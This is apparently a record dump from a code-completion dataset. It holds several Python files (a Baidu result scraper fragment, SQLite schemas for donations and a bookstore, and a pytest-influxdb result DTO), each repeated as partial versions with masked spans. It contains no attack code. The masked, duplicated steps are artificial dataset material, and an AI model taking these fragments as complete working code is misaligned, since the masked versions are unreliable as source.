\"filter\":\n self.count.all_checked_totals+=1\n\n print (\"[ID]:%d [URL]:%s [TITLE]:%s\"%(i,realurl,title))\n if self.savefile == 'True':\n have_url = 0\n with open(key+'.txt','r') as foo:\n for line in foo.readlines():\n if realurl in line:\n have_url = 1\n if have_url ==0:\n if self.write_title:\n if self.write_name:\n logfile.write(self.search_name+realurl+' '+title+'\\n')\n else:\n logfile.write(realurl+' '+title+'\\n')\n else:\n if self.write_name:\n logfile.write(self.search_name+realurl+'\\n')\n else:\n logfile.write(realurl+'\\n')\n else:\n self.count.all_delete_totals+=1 \n else:\n self.count.all_filter_totals+=1\n if self.savefile == 'True': \n logfile.close() \n print (\"==========================百度 第%s页采集结束================\\n\"%(page_num)) \n \n ",
"step-ids": [
2,
3,
4,
5,
6
]
}
|
[
2,
3,
4,
5,
6
] |
import sqlite3

if __name__ == '__main__':
    conn = sqlite3.connect('donations.sqlite')
    c = conn.cursor()

    # Drop any stale tables so the schema can be rebuilt from scratch.
    query = """DROP TABLE IF EXISTS factions;"""
    c.execute(query)
    query = """DROP TABLE IF EXISTS members;"""
    c.execute(query)
    query = """DROP TABLE IF EXISTS bank;"""
    c.execute(query)
    conn.commit()

    # One row per faction; the numeric faction id must be unique.
    query = """CREATE TABLE factions(
                id INTEGER PRIMARY KEY,
                faction INTEGER UNIQUE,
                faction_name TEXT);"""
    c.execute(query)
    conn.commit()

    # Each member belongs to a faction via a foreign key.
    query = """CREATE TABLE members(
                id INTEGER PRIMARY KEY,
                member INTEGER UNIQUE,
                member_name TEXT,
                faction INTEGER,
                FOREIGN KEY(faction) REFERENCES factions(faction));"""
    c.execute(query)
    conn.commit()

    # One bank row per member, timestamped automatically on insert.
    query = """CREATE TABLE bank(
                id INTEGER PRIMARY KEY,
                stored_timestamp TEXT DEFAULT CURRENT_TIMESTAMP,
                member INTEGER UNIQUE,
                money_balance INTEGER,
                point_balance INTEGER,
                FOREIGN KEY (member) REFERENCES members(member));"""
    c.execute(query)
    conn.commit()
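
    # A minimal usage sketch: populate one sample row per table so the
    # foreign keys line up, then read the balances back; the ids, names,
    # and balances below are illustrative only.
    c.execute('INSERT INTO factions(faction, faction_name) VALUES (?, ?)',
              (101, 'Example Faction'))
    c.execute('INSERT INTO members(member, member_name, faction) VALUES (?, ?, ?)',
              (1, 'Example Member', 101))
    c.execute('INSERT INTO bank(member, money_balance, point_balance) VALUES (?, ?, ?)',
              (1, 5000, 20))
    conn.commit()
    for row in c.execute("""SELECT m.member_name, f.faction_name,
                                   b.money_balance, b.point_balance
                            FROM bank b
                            JOIN members m ON m.member = b.member
                            JOIN factions f ON f.faction = m.faction"""):
        print(row)
    conn.close()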
|
normal
|
{
"blob_id": "b6b8dfaa9644fa4f4c250358b89f4a30c26c317f",
"index": 4788,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nif __name__ == '__main__':\n conn = sqlite3.connect('donations.sqlite')\n c = conn.cursor()\n query = 'DROP TABLE IF EXISTS factions;'\n c.execute(query)\n query = 'DROP TABLE IF EXISTS members;'\n c.execute(query)\n query = 'DROP TABLE IF EXISTS bank;'\n c.execute(query)\n conn.commit()\n query = \"\"\"CREATE TABLE factions(\n id INTEGER PRIMARY KEY,\n faction INTEGER UNIQUE,\n faction_name TEXT);\"\"\"\n c.execute(query)\n conn.commit()\n query = \"\"\"CREATE TABLE members(\n id INTEGER PRIMARY KEY,\n member INTEGER UNIQUE,\n member_name TEXT,\n faction INTEGER,\n FOREIGN KEY(faction) REFERENCES factions(faction));\"\"\"\n c.execute(query)\n conn.commit()\n query = \"\"\"CREATE TABLE bank(\n id INTEGER PRIMARY KEY,\n stored_timestamp TEXT DEFAULT CURRENT_TIMESTAMP,\n member INTEGER UNIQUE,\n money_balance INTEGER,\n point_balance INTEGER,\n FOREIGN KEY (member) REFERENCES members(member));\"\"\"\n c.execute(query)\n conn.commit()\n",
"step-3": "import sqlite3\nif __name__ == '__main__':\n conn = sqlite3.connect('donations.sqlite')\n c = conn.cursor()\n query = 'DROP TABLE IF EXISTS factions;'\n c.execute(query)\n query = 'DROP TABLE IF EXISTS members;'\n c.execute(query)\n query = 'DROP TABLE IF EXISTS bank;'\n c.execute(query)\n conn.commit()\n query = \"\"\"CREATE TABLE factions(\n id INTEGER PRIMARY KEY,\n faction INTEGER UNIQUE,\n faction_name TEXT);\"\"\"\n c.execute(query)\n conn.commit()\n query = \"\"\"CREATE TABLE members(\n id INTEGER PRIMARY KEY,\n member INTEGER UNIQUE,\n member_name TEXT,\n faction INTEGER,\n FOREIGN KEY(faction) REFERENCES factions(faction));\"\"\"\n c.execute(query)\n conn.commit()\n query = \"\"\"CREATE TABLE bank(\n id INTEGER PRIMARY KEY,\n stored_timestamp TEXT DEFAULT CURRENT_TIMESTAMP,\n member INTEGER UNIQUE,\n money_balance INTEGER,\n point_balance INTEGER,\n FOREIGN KEY (member) REFERENCES members(member));\"\"\"\n c.execute(query)\n conn.commit()\n",
"step-4": "import sqlite3\n\n\nif __name__ == '__main__':\n conn = sqlite3.connect('donations.sqlite')\n c = conn.cursor()\n\n query = \"\"\"DROP TABLE IF EXISTS factions;\"\"\"\n c.execute(query)\n query = \"\"\"DROP TABLE IF EXISTS members;\"\"\"\n c.execute(query)\n query = \"\"\"DROP TABLE IF EXISTS bank;\"\"\"\n c.execute(query)\n conn.commit()\n\n query = \"\"\"CREATE TABLE factions(\n id INTEGER PRIMARY KEY,\n faction INTEGER UNIQUE,\n faction_name TEXT);\"\"\"\n\n c.execute(query)\n conn.commit()\n\n query = \"\"\"CREATE TABLE members(\n id INTEGER PRIMARY KEY,\n member INTEGER UNIQUE,\n member_name TEXT,\n faction INTEGER,\n FOREIGN KEY(faction) REFERENCES factions(faction));\"\"\"\n c.execute(query)\n conn.commit()\n\n query = \"\"\"CREATE TABLE bank(\n id INTEGER PRIMARY KEY,\n stored_timestamp TEXT DEFAULT CURRENT_TIMESTAMP,\n member INTEGER UNIQUE,\n money_balance INTEGER,\n point_balance INTEGER,\n FOREIGN KEY (member) REFERENCES members(member));\"\"\"\n c.execute(query)\n conn.commit()\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
def view():
connect = sqlite3.connect('books.db')
cursor = connect.cursor()
cursor.execute('SELECT * FROM bookstore')
books = cursor.fetchall()
connect.close()
return books
<|reserved_special_token_0|>
def delete(id):
connect = sqlite3.connect('books.db')
cursor = connect.cursor()
cursor.execute('DELETE FROM bookstore WHERE id=?', (id,))
connect.commit()
connect.close()
def update(id, title, author, year, isbn):
connect = sqlite3.connect('books.db')
cursor = connect.cursor()
cursor.execute(
'UPDATE bookstore SET title=?, author=?, year=?, isbn=?WHERE id=?',
(title, author, year, isbn, id))
connect.commit()
connect.close()
def close():
return True
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def connect():
connect = sqlite3.connect('books.db')
cursor = connect.cursor()
cursor.execute(
'CREATE TABLE IF NOT EXISTS bookstore (id INTEGER PRIMARY KEY,title TEXT,author TEXT,year INTEGER,isbn INTEGER)'
)
connect.commit()
connect.close()
<|reserved_special_token_0|>
def view():
connect = sqlite3.connect('books.db')
cursor = connect.cursor()
cursor.execute('SELECT * FROM bookstore')
books = cursor.fetchall()
connect.close()
return books
def search(title='', author='', year='', isbn=''):
connect = sqlite3.connect('books.db')
cursor = connect.cursor()
cursor.execute(
'SELECT * FROM bookstore WHERE title=?OR author=?OR year=?OR isbn=?',
(title, author, year, isbn))
books = cursor.fetchall()
connect.close()
return books
def delete(id):
connect = sqlite3.connect('books.db')
cursor = connect.cursor()
cursor.execute('DELETE FROM bookstore WHERE id=?', (id,))
connect.commit()
connect.close()
def update(id, title, author, year, isbn):
connect = sqlite3.connect('books.db')
cursor = connect.cursor()
cursor.execute(
'UPDATE bookstore SET title=?, author=?, year=?, isbn=?WHERE id=?',
(title, author, year, isbn, id))
connect.commit()
connect.close()
def close():
return True
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def connect():
connect = sqlite3.connect('books.db')
cursor = connect.cursor()
cursor.execute(
'CREATE TABLE IF NOT EXISTS bookstore (id INTEGER PRIMARY KEY,title TEXT,author TEXT,year INTEGER,isbn INTEGER)'
)
connect.commit()
connect.close()
def insert(title, author, year, isbn):
connect = sqlite3.connect('books.db')
cursor = connect.cursor()
cursor.execute('INSERT INTO bookstore VALUES (NULL,?,?,?,?)', (title,
author, year, isbn))
connect.commit()
connect.close()
def view():
connect = sqlite3.connect('books.db')
cursor = connect.cursor()
cursor.execute('SELECT * FROM bookstore')
books = cursor.fetchall()
connect.close()
return books
def search(title='', author='', year='', isbn=''):
connect = sqlite3.connect('books.db')
cursor = connect.cursor()
cursor.execute(
'SELECT * FROM bookstore WHERE title=?OR author=?OR year=?OR isbn=?',
(title, author, year, isbn))
books = cursor.fetchall()
connect.close()
return books
def delete(id):
connect = sqlite3.connect('books.db')
cursor = connect.cursor()
cursor.execute('DELETE FROM bookstore WHERE id=?', (id,))
connect.commit()
connect.close()
def update(id, title, author, year, isbn):
connect = sqlite3.connect('books.db')
cursor = connect.cursor()
cursor.execute(
'UPDATE bookstore SET title=?, author=?, year=?, isbn=?WHERE id=?',
(title, author, year, isbn, id))
connect.commit()
connect.close()
def close():
return True
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def connect():
connect = sqlite3.connect('books.db')
cursor = connect.cursor()
cursor.execute(
'CREATE TABLE IF NOT EXISTS bookstore (id INTEGER PRIMARY KEY,title TEXT,author TEXT,year INTEGER,isbn INTEGER)'
)
connect.commit()
connect.close()
def insert(title, author, year, isbn):
connect = sqlite3.connect('books.db')
cursor = connect.cursor()
cursor.execute('INSERT INTO bookstore VALUES (NULL,?,?,?,?)', (title,
author, year, isbn))
connect.commit()
connect.close()
def view():
connect = sqlite3.connect('books.db')
cursor = connect.cursor()
cursor.execute('SELECT * FROM bookstore')
books = cursor.fetchall()
connect.close()
return books
def search(title='', author='', year='', isbn=''):
connect = sqlite3.connect('books.db')
cursor = connect.cursor()
cursor.execute(
'SELECT * FROM bookstore WHERE title=?OR author=?OR year=?OR isbn=?',
(title, author, year, isbn))
books = cursor.fetchall()
connect.close()
return books
def delete(id):
connect = sqlite3.connect('books.db')
cursor = connect.cursor()
cursor.execute('DELETE FROM bookstore WHERE id=?', (id,))
connect.commit()
connect.close()
def update(id, title, author, year, isbn):
connect = sqlite3.connect('books.db')
cursor = connect.cursor()
cursor.execute(
'UPDATE bookstore SET title=?, author=?, year=?, isbn=?WHERE id=?',
(title, author, year, isbn, id))
connect.commit()
connect.close()
def close():
return True
connect()
<|reserved_special_token_1|>
import sqlite3
def connect():
connect = sqlite3.connect("books.db")
cursor = connect.cursor()
cursor.execute("CREATE TABLE IF NOT EXISTS bookstore (id INTEGER PRIMARY KEY,"
"title TEXT,"
"author TEXT,"
"year INTEGER,"
"isbn INTEGER)"
)
connect.commit()
connect.close()
def insert(title,author,year,isbn):
connect = sqlite3.connect("books.db")
cursor = connect.cursor()
cursor.execute("INSERT INTO bookstore VALUES (NULL,?,?,?,?)",(title, author, year, isbn))
connect.commit()
connect.close()
def view():
connect = sqlite3.connect("books.db")
cursor = connect.cursor()
cursor.execute("SELECT * FROM bookstore")
books = cursor.fetchall()
connect.close()
return books
def search(title="", author="", year="", isbn=""):
connect = sqlite3.connect("books.db")
cursor = connect.cursor()
cursor.execute("SELECT * FROM bookstore WHERE title=?"
"OR author=?"
"OR year=?"
"OR isbn=?", (title,author,year,isbn))
books = cursor.fetchall()
connect.close()
return books
def delete(id):
connect = sqlite3.connect("books.db")
cursor = connect.cursor()
cursor.execute("DELETE FROM bookstore WHERE id=?", (id,))
connect.commit()
connect.close()
def update(id,title,author,year,isbn):
connect = sqlite3.connect("books.db")
cursor = connect.cursor()
cursor.execute("UPDATE bookstore SET title=?, author=?, year=?, isbn=?"
"WHERE id=?", (title, author, year, isbn, id))
connect.commit()
connect.close()
def close():
return True
connect()
# insert("Holy Bible", "Joseph Smith", 1823, 123456)
# print(view())
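
# A short usage sketch of the helpers above; the sample values are
# illustrative only:
# insert("Example Title", "Example Author", 1999, 1234567890)
# print(search(author="Example Author"))  # matches on any one field
# update(1, "Example Title", "Example Author", 2000, 1234567890)
# delete(1)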
|
flexible
|
{
"blob_id": "d7d23b04f6e73db6a0a8730192398941743f32ce",
"index": 6800,
"step-1": "<mask token>\n\n\ndef view():\n connect = sqlite3.connect('books.db')\n cursor = connect.cursor()\n cursor.execute('SELECT * FROM bookstore')\n books = cursor.fetchall()\n connect.close()\n return books\n\n\n<mask token>\n\n\ndef delete(id):\n connect = sqlite3.connect('books.db')\n cursor = connect.cursor()\n cursor.execute('DELETE FROM bookstore WHERE id=?', (id,))\n connect.commit()\n connect.close()\n\n\ndef update(id, title, author, year, isbn):\n connect = sqlite3.connect('books.db')\n cursor = connect.cursor()\n cursor.execute(\n 'UPDATE bookstore SET title=?, author=?, year=?, isbn=?WHERE id=?',\n (title, author, year, isbn, id))\n connect.commit()\n connect.close()\n\n\ndef close():\n return True\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef connect():\n connect = sqlite3.connect('books.db')\n cursor = connect.cursor()\n cursor.execute(\n 'CREATE TABLE IF NOT EXISTS bookstore (id INTEGER PRIMARY KEY,title TEXT,author TEXT,year INTEGER,isbn INTEGER)'\n )\n connect.commit()\n connect.close()\n\n\n<mask token>\n\n\ndef view():\n connect = sqlite3.connect('books.db')\n cursor = connect.cursor()\n cursor.execute('SELECT * FROM bookstore')\n books = cursor.fetchall()\n connect.close()\n return books\n\n\ndef search(title='', author='', year='', isbn=''):\n connect = sqlite3.connect('books.db')\n cursor = connect.cursor()\n cursor.execute(\n 'SELECT * FROM bookstore WHERE title=?OR author=?OR year=?OR isbn=?',\n (title, author, year, isbn))\n books = cursor.fetchall()\n connect.close()\n return books\n\n\ndef delete(id):\n connect = sqlite3.connect('books.db')\n cursor = connect.cursor()\n cursor.execute('DELETE FROM bookstore WHERE id=?', (id,))\n connect.commit()\n connect.close()\n\n\ndef update(id, title, author, year, isbn):\n connect = sqlite3.connect('books.db')\n cursor = connect.cursor()\n cursor.execute(\n 'UPDATE bookstore SET title=?, author=?, year=?, isbn=?WHERE id=?',\n (title, author, year, isbn, id))\n connect.commit()\n connect.close()\n\n\ndef close():\n return True\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef connect():\n connect = sqlite3.connect('books.db')\n cursor = connect.cursor()\n cursor.execute(\n 'CREATE TABLE IF NOT EXISTS bookstore (id INTEGER PRIMARY KEY,title TEXT,author TEXT,year INTEGER,isbn INTEGER)'\n )\n connect.commit()\n connect.close()\n\n\ndef insert(title, author, year, isbn):\n connect = sqlite3.connect('books.db')\n cursor = connect.cursor()\n cursor.execute('INSERT INTO bookstore VALUES (NULL,?,?,?,?)', (title,\n author, year, isbn))\n connect.commit()\n connect.close()\n\n\ndef view():\n connect = sqlite3.connect('books.db')\n cursor = connect.cursor()\n cursor.execute('SELECT * FROM bookstore')\n books = cursor.fetchall()\n connect.close()\n return books\n\n\ndef search(title='', author='', year='', isbn=''):\n connect = sqlite3.connect('books.db')\n cursor = connect.cursor()\n cursor.execute(\n 'SELECT * FROM bookstore WHERE title=?OR author=?OR year=?OR isbn=?',\n (title, author, year, isbn))\n books = cursor.fetchall()\n connect.close()\n return books\n\n\ndef delete(id):\n connect = sqlite3.connect('books.db')\n cursor = connect.cursor()\n cursor.execute('DELETE FROM bookstore WHERE id=?', (id,))\n connect.commit()\n connect.close()\n\n\ndef update(id, title, author, year, isbn):\n connect = sqlite3.connect('books.db')\n cursor = connect.cursor()\n cursor.execute(\n 'UPDATE bookstore SET title=?, author=?, year=?, isbn=?WHERE id=?',\n (title, author, year, isbn, id))\n connect.commit()\n connect.close()\n\n\ndef close():\n return True\n\n\n<mask token>\n",
"step-4": "<mask token>\n\n\ndef connect():\n connect = sqlite3.connect('books.db')\n cursor = connect.cursor()\n cursor.execute(\n 'CREATE TABLE IF NOT EXISTS bookstore (id INTEGER PRIMARY KEY,title TEXT,author TEXT,year INTEGER,isbn INTEGER)'\n )\n connect.commit()\n connect.close()\n\n\ndef insert(title, author, year, isbn):\n connect = sqlite3.connect('books.db')\n cursor = connect.cursor()\n cursor.execute('INSERT INTO bookstore VALUES (NULL,?,?,?,?)', (title,\n author, year, isbn))\n connect.commit()\n connect.close()\n\n\ndef view():\n connect = sqlite3.connect('books.db')\n cursor = connect.cursor()\n cursor.execute('SELECT * FROM bookstore')\n books = cursor.fetchall()\n connect.close()\n return books\n\n\ndef search(title='', author='', year='', isbn=''):\n connect = sqlite3.connect('books.db')\n cursor = connect.cursor()\n cursor.execute(\n 'SELECT * FROM bookstore WHERE title=?OR author=?OR year=?OR isbn=?',\n (title, author, year, isbn))\n books = cursor.fetchall()\n connect.close()\n return books\n\n\ndef delete(id):\n connect = sqlite3.connect('books.db')\n cursor = connect.cursor()\n cursor.execute('DELETE FROM bookstore WHERE id=?', (id,))\n connect.commit()\n connect.close()\n\n\ndef update(id, title, author, year, isbn):\n connect = sqlite3.connect('books.db')\n cursor = connect.cursor()\n cursor.execute(\n 'UPDATE bookstore SET title=?, author=?, year=?, isbn=?WHERE id=?',\n (title, author, year, isbn, id))\n connect.commit()\n connect.close()\n\n\ndef close():\n return True\n\n\nconnect()\n",
"step-5": "import sqlite3\n\ndef connect():\n connect = sqlite3.connect(\"books.db\")\n cursor = connect.cursor()\n cursor.execute(\"CREATE TABLE IF NOT EXISTS bookstore (id INTEGER PRIMARY KEY,\"\n \"title TEXT,\"\n \"author TEXT,\"\n \"year INTEGER,\"\n \"isbn INTEGER)\"\n )\n connect.commit()\n connect.close()\n\ndef insert(title,author,year,isbn):\n connect = sqlite3.connect(\"books.db\")\n cursor = connect.cursor()\n cursor.execute(\"INSERT INTO bookstore VALUES (NULL,?,?,?,?)\",(title, author, year, isbn))\n connect.commit()\n connect.close()\n\ndef view():\n connect = sqlite3.connect(\"books.db\")\n cursor = connect.cursor()\n cursor.execute(\"SELECT * FROM bookstore\")\n books = cursor.fetchall()\n connect.close()\n return books\n\ndef search(title=\"\", author=\"\", year=\"\", isbn=\"\"):\n connect = sqlite3.connect(\"books.db\")\n cursor = connect.cursor()\n cursor.execute(\"SELECT * FROM bookstore WHERE title=?\"\n \"OR author=?\"\n \"OR year=?\"\n \"OR isbn=?\", (title,author,year,isbn))\n books = cursor.fetchall()\n connect.close()\n return books\n\ndef delete(id):\n connect = sqlite3.connect(\"books.db\")\n cursor = connect.cursor()\n cursor.execute(\"DELETE FROM bookstore WHERE id=?\", (id,))\n connect.commit()\n connect.close()\n\ndef update(id,title,author,year,isbn):\n connect = sqlite3.connect(\"books.db\")\n cursor = connect.cursor()\n cursor.execute(\"UPDATE bookstore SET title=?, author=?, year=?, isbn=?\"\n \"WHERE id=?\", (title, author, year, isbn, id))\n connect.commit()\n connect.close()\n\ndef close():\n return True\n\n\n\nconnect()\n# insert(\"Holy Bible\", \"Joseph Smith\", 1823, 123456)\n# print(view())\n\n",
"step-ids": [
4,
6,
7,
8,
10
]
}
|
[
4,
6,
7,
8,
10
] |
import json
import time
from pytest_influxdb.data_manager import DataManager
class SuiteResultDTO:
__run = 'UNDEFINED'
__project = 'UNDEFINED'
__version = 'UNDEFINED'
__passed = None
__failed = None
__skipped = None
__error = None
__duration_sec = 0
__disabled = 0
__retries = 0
__suite_result_dict = {'tags': {}, 'fields': {}}
def set_run(self, run):
if run != '':
self.__run = str(run)
def set_project(self, project):
if project != '':
self.__project = str(project)
def set_version(self, version):
if version != '':
self.__version = str(version)
def set_passed(self, passed):
self.__passed = int(passed)
def set_failed(self, failed):
self.__failed = int(failed)
def set_skipped(self, skipped):
self.__skipped = int(skipped)
def set_error(self, error):
self.__error = int(error)
def set_duration_sec(self, duration_sec):
self.__duration_sec = int(duration_sec)
def set_disabled(self, disabled):
self.__disabled = int(disabled)
def set_retries(self, retries):
self.__retries = int(retries)
def set_suite_result_dict(self, suite_result_dict):
SuiteResultDTO.__suite_result_dict = suite_result_dict
def get_suite_json(self, measurement_name):
json_body = [
{
"measurement": measurement_name,
"tags": {
"run": self.__run,
"project": self.__project,
"version": self.__version
},
"fields": {
"pass": self.__passed,
"fail": self.__failed,
"skip": self.__skipped,
"error": self.__error,
"disabled": self.__disabled,
"duration_sec": self.__duration_sec,
"retries": self.__retries
}
}
]
# Appending custom values to json_body
tags_dict = SuiteResultDTO.__suite_result_dict['tags']
for key in tags_dict:
suite_tags = json_body[0]['tags']
suite_tags.update({key: tags_dict[key]})
fields_dict = SuiteResultDTO.__suite_result_dict['fields']
for key in fields_dict:
suite_fields = json_body[0]['fields']
suite_fields.update({key: fields_dict[key]})
return json_body
def set_tag_values(self, tags_dict):
suite_tags = SuiteResultDTO.__suite_result_dict
suite_tags['tags'].update(tags_dict)
def set_field_values(self, fields_dict):
suite_fields = SuiteResultDTO.__suite_result_dict
suite_fields['fields'].update(fields_dict)
def set_suite_custom_values(self, influxdb_values):
if influxdb_values and influxdb_values != '':
if isinstance(influxdb_values, str):
influxdb_values = json.loads(influxdb_values)
self.set_field_values(influxdb_values['fields']['suite_result'])
self.set_tag_values(influxdb_values['tags']['suite_result'])
def get_suite_result_dto(self, terminalreporter, global_values, influxdb_components, db_measurement_name_for_suite):
# Preparing execution time and suite results from the terminalreporter (where all the data collected)
execution_time = round(time.time() - terminalreporter._sessionstarttime)
suite_results_dict = DataManager().get_results_dict(terminalreporter.stats)
# Setting the values to the suite_result_dto instance
self.set_passed(suite_results_dict.get('passed'))
self.set_failed(suite_results_dict.get('failed'))
self.set_skipped(suite_results_dict.get('skipped'))
self.set_error(suite_results_dict.get('error'))
self.set_disabled(suite_results_dict.get('disabled'))
self.set_duration_sec(execution_time)
self.set_retries(suite_results_dict.get('reruns'))
self.set_run(global_values.get("run"))
self.set_project(global_values.get("project"))
self.set_version(global_values.get("version"))
self.set_suite_custom_values(global_values.get("influxdb_values"))
self.merge_suite_result(global_values.get('merged'), influxdb_components,
db_measurement_name_for_suite, global_values.get("run"))
return self
def merge_suite_result(self, merged_enabled, influxdb_components, db_measurement_name_for_suite, run_id_value):
# Merging the existing suite results with the suite_results from db for the same run
# if 'merged' config value is True
existing_suite_result = influxdb_components.get_results_by_run(db_measurement_name_for_suite, run_id_value)
old_suite_list = list(existing_suite_result.get_points(measurement=f'{db_measurement_name_for_suite}'))
if len(old_suite_list) != 0 and merged_enabled:
old_suite_total_count = old_suite_list[0]['pass'] + old_suite_list[0]['fail'] + old_suite_list[0][
'skip']
old_disabled_tests_count = old_suite_list[0]['disabled']
self.set_passed(
old_suite_total_count - self.__failed - self.__skipped)
self.set_disabled(old_disabled_tests_count)
influxdb_components.delete_results_by_run(db_measurement_name_for_suite, run_id_value)
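
# A minimal sketch of the json body this DTO produces when used outside the
# pytest hooks; the values are illustrative only:
# dto = SuiteResultDTO()
# dto.set_run('run-42')
# dto.set_project('demo')
# dto.set_version('1.0.0')
# dto.set_passed(10)
# dto.set_failed(1)
# dto.set_skipped(2)
# dto.set_error(0)
# dto.set_duration_sec(35)
# dto.set_retries(1)
# print(dto.get_suite_json('suite_results'))  # shaped for InfluxDBClient.write_points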
|
normal
|
{
"blob_id": "84c3427a994bd6c57d9fa8449e4fc7a3de801170",
"index": 9271,
"step-1": "<mask token>\n\n\nclass SuiteResultDTO:\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def set_project(self, project):\n if project != '':\n self.__project = str(project)\n\n def set_version(self, version):\n if version != '':\n self.__version = str(version)\n <mask token>\n <mask token>\n\n def set_skipped(self, skipped):\n self.__skipped = int(skipped)\n\n def set_error(self, error):\n self.__error = int(error)\n\n def set_duration_sec(self, duration_sec):\n self.__duration_sec = int(duration_sec)\n\n def set_disabled(self, disabled):\n self.__disabled = int(disabled)\n <mask token>\n\n def set_suite_result_dict(self, suite_result_dict):\n SuiteResultDTO.__suite_result_dict = suite_result_dict\n <mask token>\n\n def set_tag_values(self, tags_dict):\n suite_tags = SuiteResultDTO.__suite_result_dict\n suite_tags['tags'].update(tags_dict)\n\n def set_field_values(self, fields_dict):\n suite_fields = SuiteResultDTO.__suite_result_dict\n suite_fields['fields'].update(fields_dict)\n\n def set_suite_custom_values(self, influxdb_values):\n if influxdb_values and influxdb_values != '':\n if isinstance(influxdb_values, str):\n influxdb_values = json.loads(influxdb_values)\n self.set_field_values(influxdb_values['fields']['suite_result'])\n self.set_tag_values(influxdb_values['tags']['suite_result'])\n\n def get_suite_result_dto(self, terminalreporter, global_values,\n influxdb_components, db_measurement_name_for_suite):\n execution_time = round(time.time() - terminalreporter._sessionstarttime\n )\n suite_results_dict = DataManager().get_results_dict(terminalreporter\n .stats)\n self.set_passed(suite_results_dict.get('passed'))\n self.set_failed(suite_results_dict.get('failed'))\n self.set_skipped(suite_results_dict.get('skipped'))\n self.set_error(suite_results_dict.get('error'))\n self.set_disabled(suite_results_dict.get('disabled'))\n self.set_duration_sec(execution_time)\n self.set_retries(suite_results_dict.get('reruns'))\n self.set_run(global_values.get('run'))\n self.set_project(global_values.get('project'))\n self.set_version(global_values.get('version'))\n self.set_suite_custom_values(global_values.get('influxdb_values'))\n self.merge_suite_result(global_values.get('merged'),\n influxdb_components, db_measurement_name_for_suite,\n global_values.get('run'))\n return self\n\n def merge_suite_result(self, merged_enabled, influxdb_components,\n db_measurement_name_for_suite, run_id_value):\n existing_suite_result = influxdb_components.get_results_by_run(\n db_measurement_name_for_suite, run_id_value)\n old_suite_list = list(existing_suite_result.get_points(measurement=\n f'{db_measurement_name_for_suite}'))\n if len(old_suite_list) != 0 and merged_enabled:\n old_suite_total_count = old_suite_list[0]['pass'] + old_suite_list[\n 0]['fail'] + old_suite_list[0]['skip']\n old_disabled_tests_count = old_suite_list[0]['disabled']\n self.set_passed(old_suite_total_count - self.__failed - self.\n __skipped)\n self.set_disabled(old_disabled_tests_count)\n influxdb_components.delete_results_by_run(\n db_measurement_name_for_suite, run_id_value)\n",
"step-2": "<mask token>\n\n\nclass SuiteResultDTO:\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def set_project(self, project):\n if project != '':\n self.__project = str(project)\n\n def set_version(self, version):\n if version != '':\n self.__version = str(version)\n <mask token>\n\n def set_failed(self, failed):\n self.__failed = int(failed)\n\n def set_skipped(self, skipped):\n self.__skipped = int(skipped)\n\n def set_error(self, error):\n self.__error = int(error)\n\n def set_duration_sec(self, duration_sec):\n self.__duration_sec = int(duration_sec)\n\n def set_disabled(self, disabled):\n self.__disabled = int(disabled)\n <mask token>\n\n def set_suite_result_dict(self, suite_result_dict):\n SuiteResultDTO.__suite_result_dict = suite_result_dict\n <mask token>\n\n def set_tag_values(self, tags_dict):\n suite_tags = SuiteResultDTO.__suite_result_dict\n suite_tags['tags'].update(tags_dict)\n\n def set_field_values(self, fields_dict):\n suite_fields = SuiteResultDTO.__suite_result_dict\n suite_fields['fields'].update(fields_dict)\n\n def set_suite_custom_values(self, influxdb_values):\n if influxdb_values and influxdb_values != '':\n if isinstance(influxdb_values, str):\n influxdb_values = json.loads(influxdb_values)\n self.set_field_values(influxdb_values['fields']['suite_result'])\n self.set_tag_values(influxdb_values['tags']['suite_result'])\n\n def get_suite_result_dto(self, terminalreporter, global_values,\n influxdb_components, db_measurement_name_for_suite):\n execution_time = round(time.time() - terminalreporter._sessionstarttime\n )\n suite_results_dict = DataManager().get_results_dict(terminalreporter\n .stats)\n self.set_passed(suite_results_dict.get('passed'))\n self.set_failed(suite_results_dict.get('failed'))\n self.set_skipped(suite_results_dict.get('skipped'))\n self.set_error(suite_results_dict.get('error'))\n self.set_disabled(suite_results_dict.get('disabled'))\n self.set_duration_sec(execution_time)\n self.set_retries(suite_results_dict.get('reruns'))\n self.set_run(global_values.get('run'))\n self.set_project(global_values.get('project'))\n self.set_version(global_values.get('version'))\n self.set_suite_custom_values(global_values.get('influxdb_values'))\n self.merge_suite_result(global_values.get('merged'),\n influxdb_components, db_measurement_name_for_suite,\n global_values.get('run'))\n return self\n\n def merge_suite_result(self, merged_enabled, influxdb_components,\n db_measurement_name_for_suite, run_id_value):\n existing_suite_result = influxdb_components.get_results_by_run(\n db_measurement_name_for_suite, run_id_value)\n old_suite_list = list(existing_suite_result.get_points(measurement=\n f'{db_measurement_name_for_suite}'))\n if len(old_suite_list) != 0 and merged_enabled:\n old_suite_total_count = old_suite_list[0]['pass'] + old_suite_list[\n 0]['fail'] + old_suite_list[0]['skip']\n old_disabled_tests_count = old_suite_list[0]['disabled']\n self.set_passed(old_suite_total_count - self.__failed - self.\n __skipped)\n self.set_disabled(old_disabled_tests_count)\n influxdb_components.delete_results_by_run(\n db_measurement_name_for_suite, run_id_value)\n",
